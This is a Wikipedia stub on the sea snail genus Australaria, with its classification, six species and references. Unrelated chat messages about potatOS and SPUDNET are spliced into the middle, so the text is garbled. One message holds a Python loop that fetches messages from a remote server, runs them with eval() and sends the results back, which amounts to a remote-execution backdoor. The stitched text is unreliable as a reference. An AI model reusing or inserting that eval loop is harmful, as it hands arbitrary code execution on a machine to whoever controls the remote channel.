Australaria

Australaria is a genus of sea snails, marine gastropod mollusks in the family Fasciolariidae, the spindle snails, the tulip snails and their allies.[1]

Australaria
Scientific classification
Kingdom:
Phylum:
Class:
(unranked):
Superfamily:
Family:
Subfamily:
Fasciolariinae
Genus:
Australaria

Snyder, Vermeij & Lyons, 2012
Type species
Pyrula australasia Perry, 1811

Species

Species within the genus Australaria include:

  • Australaria australasia (Perry, 1811)
  • Australaria bakeri (Gatliff & Gabriel, 1912)
  • Australaria coronata (Lamarck, 1822)
  • Australaria eucla (Cotton, 1953)
  • Australaria fusiformis (Kiener, 1840)
  • Australaria tenuitesta Snyder, Vermeij & Lyons, 2012
gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.

References

  1. Bouchet, P. (2012). Australaria Snyder, Vermeij & Lyons, 2012. Accessed through: World Register of Marine Species at http://www.marinespecies.org/aphia.php?p=taxdetails&id=607872 on 2012-08-25
  • Snyder M.A., Vermeij G.J. & Lyons W.G. (2012) The genera and biogeography of Fasciolariinae (Gastropoda, Neogastropoda, Fasciolariidae). Basteria 76(1-3): 31-70


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.